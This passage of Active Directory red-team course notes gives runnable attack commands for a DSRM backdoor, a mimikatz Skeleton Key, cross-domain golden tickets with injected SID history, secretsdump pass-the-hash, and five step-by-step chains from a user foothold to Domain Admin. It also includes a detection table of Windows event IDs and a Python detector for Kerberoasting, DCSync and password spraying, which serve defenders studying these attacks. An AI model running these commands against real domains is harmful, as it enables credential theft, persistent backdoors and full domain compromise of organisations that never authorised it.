8.3 DSRM Backdoor
What it is: The Directory Services Restore Mode (DSRM) account is the local Administrator in a DC's own SAM, normally usable only when the DC is booted into DSRM. Setting DsrmAdminLogonBehavior to 2 lets it log on over the network while the DC runs normally, so its hash becomes a local admin credential on the DC that no domain password reset touches.
# Dump DSRM hash (it lives in the DC's local SAM)
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
# Enable network DSRM logon (registry key on DC)
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2
# Authenticate with the DSRM hash (Pass-the-Hash as the DC's local account, not a domain account); dumps SAM and LSA secrets, including the DC machine account key
impacket-secretsdump -hashes :<dsrm_hash> 'DC01/Administrator@10.10.10.1'
8.4 Skeleton Key
What it is: A patch injected into LSASS on a DC that makes ANY account accept a master password (mimikatz by default) in addition to its real password. Does NOT survive reboots, needs debug privileges on the DC, and the user-mode patch is blocked by LSA Protection (RunAsPPL).
.\mimikatz.exe "privilege::debug" "misc::skeleton" exit
# Now any user can auth with password "mimikatz" alongside their real password (Kerberos is downgraded to RC4 for this, so 4768/4769 with etype 0x17 for every user is the tell)
9. Trust Relationship Abuse
What It Is
Domain trusts allow users in one domain to access resources in another. Misconfigurations or design weaknesses allow attackers to escalate across domains or forests.
How Attackers Spot It
Get-DomainTrust
Get-ADTrust -Filter *
nltest /domain_trusts
SID History Injection (Cross-Domain Privilege Escalation)
How they abuse it: Inside a forest, SID filtering is not applied to parent/child (and tree-root) trusts, so a DA in a child domain can forge a ticket whose PAC carries the parent domain's Enterprise Admins SID in ExtraSids (SID History) and be treated as an Enterprise Admin in the parent. Across forest or external trusts the same trick only works if SID filtering (quarantine) has been disabled on the trusting side.
# Requires DA in the child (source) domain; /sids is the parent domain's Enterprise Admins SID (S-1-5-21-<forest root>-519)
.\mimikatz.exe "kerberos::golden /user:attacker /domain:child.corp.local /sid:<child_SID> /sids:<parent_EA_SID> /krbtgt:<child_krbtgt_hash> /ptt" exit
# Now operating with Enterprise Admin rights in the parent domain (DCSync the parent's krbtgt to make it permanent)
10. Common Attack Chains (Full Paths)
Chain A: Standard User → Domain Admin via Kerberoasting
[Foothold as domain user]
→ Enumerate SPNs (Get-DomainUser -SPN)
→ Kerberoast high-priv SPN (Rubeus)
→ Crack hash offline (Hashcat)
→ Authenticate as service account
→ Service account has DA membership or local admin on DC
→ DCSync → krbtgt hash → Golden Ticket
Chain B: Standard User → Domain Admin via ACL Abuse
[Foothold as domain user]
→ Run BloodHound → find ACL path to DA
→ Exploit WriteDACL / GenericAll on intermediate object
→ Grant self DCSync rights on domain object
→ DCSync → full credential dump
Chain C: No Credentials → Domain Admin via AD CS (ESC8)
[Network access; low-privileged domain creds are usually needed for the coercion step on patched DCs]
→ Identify AD CS HTTP enrollment endpoint
→ Run PetitPotam to coerce DC NTLM auth
→ Relay to /certsrv → obtain DC$ certificate
→ Authenticate with cert → get DC$ NTLM hash
→ DCSync as DC$ → krbtgt hash → Golden Ticket
Chain D: Local Admin → Domain Admin via Unconstrained Delegation
[Local admin on server with Unconstrained Delegation]
→ Monitor for incoming tickets (Rubeus monitor)
→ Coerce DC auth via PrinterBug / PetitPotam
→ DC$ TGT lands in memory on delegation host
→ Inject TGT → DCSync → krbtgt
Chain E: Standard User → Domain Admin via GPO Write
[Foothold as domain user]
→ Enumerate GPO write permissions (PowerView / BloodHound)
→ Identify writable GPO linked to Domain Controllers OU
→ SharpGPOAbuse → add attacker to the Administrators group on the DC (on a DC this is the domain's BUILTIN\Administrators)
→ psexec/WinRM to DC → dump NTDS.dit
Quick Reference: Detection Artefacts
| Attack | Key Windows Event IDs |
|---|---|
| Kerberoasting | 4769 on DCs with TicketEncryptionType 0x17 (RC4) for user SPNs; many distinct services requested by one account in a short window |
| AS-REP Roasting | 4768 with PreAuthType 0 for accounts that do not require pre-auth; the requester is unauthenticated, so the source IP is the pivot |
| DCSync | 4662 with AccessMask 0x100 and properties 1131f6aa-... / 1131f6ad-... (DS-Replication-Get-Changes / -All) from any account that is not a DC or a known sync account |
| Golden Ticket | 4769 / 4624 for a user with no matching 4768 from that client; TGT lifetime beyond policy (10 years by mimikatz default); RC4 TGTs in an AES-only domain |
| Pass-the-Hash | 4624 logon type 3 with AuthenticationPackageName NTLM, plus 4776 on the DC; NTLM logons by admin accounts stand out in a Kerberos-first environment |
| Unconstrained Delegation coercion | 4624 for the DC computer account (DC01$) on a non-DC host; on the DC, 5145 for the spoolss / efsrpc named pipes from an unexpected client |
| AdminSDHolder modification | 5136 (directory object modified) on CN=AdminSDHolder,CN=System; the changed ACL then shows up as 5136 on each protected group within 60 minutes |
| Skeleton Key | Mimikatz process on DC, LSASS patch; Sysmon event 10 (process access to lsass.exe), 4703 enabling SeDebugPrivilege, RC4-only Kerberos for every user afterwards |
| LLMNR/NBT-NS Poisoning | Network traffic analysis (UDP 5355 / 137 replies from a host that is not the DNS server), not event log |
| AD CS abuse | 4886 (request received), 4887 (issued) with a SAN that differs from the requester; 4768 with certificate information for PKINIT logons |
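Three rows of the table as runnable detection logic: Kerberoasting (4769), DCSync (4662) and the password-spray pattern from section 2.1 (4771). This Python block is an added example, not part of the original notes and not taken from any SIEM product; the events in SAMPLE_EVENTS are constructed dicts keyed by the EventData field names, and every host, account, IP and timestamp in them is made up.

```python
# Added example (not part of the original notes): three "Quick Reference"
# detections over constructed Security-log events. Events are dicts whose keys
# follow the EventData field names of 4769 / 4662 / 4771; all values are made up.
from collections import defaultdict
from datetime import datetime, timedelta

DS_REPLICATION_GET_CHANGES     = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
RC4_HMAC = "0x17"                # TicketEncryptionType in 4768 / 4769
KDC_ERR_PREAUTH_FAILED = "0x18"  # Status in 4771: wrong password


def detect_kerberoast(events, min_services=3):
    """4769 with RC4 for user SPNs: one requester pulling tickets for several services."""
    services_by_requester = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        svc = e["ServiceName"]
        if e["TicketEncryptionType"] == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt":
            services_by_requester[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in services_by_requester.items() if len(s) >= min_services}


def detect_dcsync(events, allowed=frozenset()):
    """4662 Control Access (0x100) carrying a replication GUID from an account not on the allow-list.

    `allowed` holds the DC computer accounts and legitimate sync accounts. A DCSync
    with a stolen DC$ credential (ESC8 chain) will not fire here; correlate 4662
    with the 4624 source address to catch that case."""
    hits = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != "0x100":
            continue
        props = e["Properties"].lower()
        if (DS_REPLICATION_GET_CHANGES in props or DS_REPLICATION_GET_CHANGES_ALL in props) \
                and e["SubjectUserName"] not in allowed:
            hits.append(e["SubjectUserName"])
    return hits


def detect_spray(events, window_minutes=30, min_accounts=10):
    """4771 failures: one source IP failing against many distinct accounts inside the window.

    Each account may fail only once (under the lockout threshold); the source ties them together."""
    window = timedelta(minutes=window_minutes)
    failures_by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4771 and e["Status"] == KDC_ERR_PREAUTH_FAILED:
            failures_by_ip[e["IpAddress"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"]))
    alerts = {}
    for ip, items in failures_by_ip.items():
        items.sort()
        start = 0
        for end in range(len(items)):  # sliding window over this source's failures
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {user for _, user in items[start:end + 1]}
            if len(distinct) >= min_accounts:
                alerts[ip] = max(alerts.get(ip, 0), len(distinct))
    return alerts


def tgs(ts, requester, service, etype):
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": requester,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": "0x0"}


SAMPLE_EVENTS = [  # constructed
    tgs("2025-01-15T09:00:00", "jdoe@CORP.LOCAL", "FS01$", "0x12"),      # normal AES ticket to a host
    tgs("2025-01-15T09:05:00", "bob@CORP.LOCAL", "svc_sql", RC4_HMAC),   # roast burst starts
    tgs("2025-01-15T09:05:01", "bob@CORP.LOCAL", "svc_backup", RC4_HMAC),
    tgs("2025-01-15T09:05:01", "bob@CORP.LOCAL", "svc_web", RC4_HMAC),
    tgs("2025-01-15T09:05:02", "bob@CORP.LOCAL", "krbtgt", RC4_HMAC),    # TGT renewal, ignored
    {"EventID": 4662, "TimeCreated": "2025-01-15T09:10:00", "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{" + DS_REPLICATION_GET_CHANGES + "} {" + DS_REPLICATION_GET_CHANGES_ALL + "}"},
    {"EventID": 4662, "TimeCreated": "2025-01-15T09:12:00", "SubjectUserName": "attacker_user", "AccessMask": "0x100",
     "Properties": "{" + DS_REPLICATION_GET_CHANGES_ALL + "}"},
    {"EventID": 4771, "TimeCreated": "2025-01-15T10:03:00", "TargetUserName": "jdoe",
     "IpAddress": "::ffff:10.10.20.7", "Status": "0x18"},               # one typo, not a spray
] + [  # one source, twelve accounts, one failure each, spread over eleven minutes
    {"EventID": 4771, "TimeCreated": f"2025-01-15T10:{i:02d}:30", "TargetUserName": f"user{i:02d}",
     "IpAddress": "::ffff:10.10.10.50", "Status": "0x18"} for i in range(12)
]

if __name__ == "__main__":
    print("kerberoast:", detect_kerberoast(SAMPLE_EVENTS))
    print("dcsync:    ", detect_dcsync(SAMPLE_EVENTS, allowed={"DC01$", "DC02$"}))
    print("spray:     ", detect_spray(SAMPLE_EVENTS))
```

The thresholds are the tuning knobs: min_services separates a roast from an application that legitimately talks to two or three SPNs, and window_minutes should match the domain's lockout observation window, since that is exactly the interval an attacker spaces attempts across to stay below the lockout threshold.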
Tools Summary
| Tool | Purpose |
|---|---|
| BloodHound / SharpHound | AD graph enumeration and attack path analysis |
| PowerView | AD reconnaissance and exploitation |
| Rubeus | Kerberos ticket operations (kerberoast, asreproast, asktgt / overpass-the-hash, ptt, s4u, monitor) |
| Mimikatz | Credential dumping, ticket forging, DCSync |
| Certipy | AD CS enumeration and exploitation |
| CrackMapExec | Swiss-army knife for network pentesting |
| Impacket | Python suite: psexec, secretsdump, ntlmrelayx, etc. |
| Responder | LLMNR/NBT-NS poisoning and hash capture |
| SharpGPOAbuse | Code execution and privilege escalation through writable GPOs |
| Kerbrute | Password spraying and user enumeration |
Document: Red Teaming 101 — Module 2.1 | For authorized penetration testing and security research only.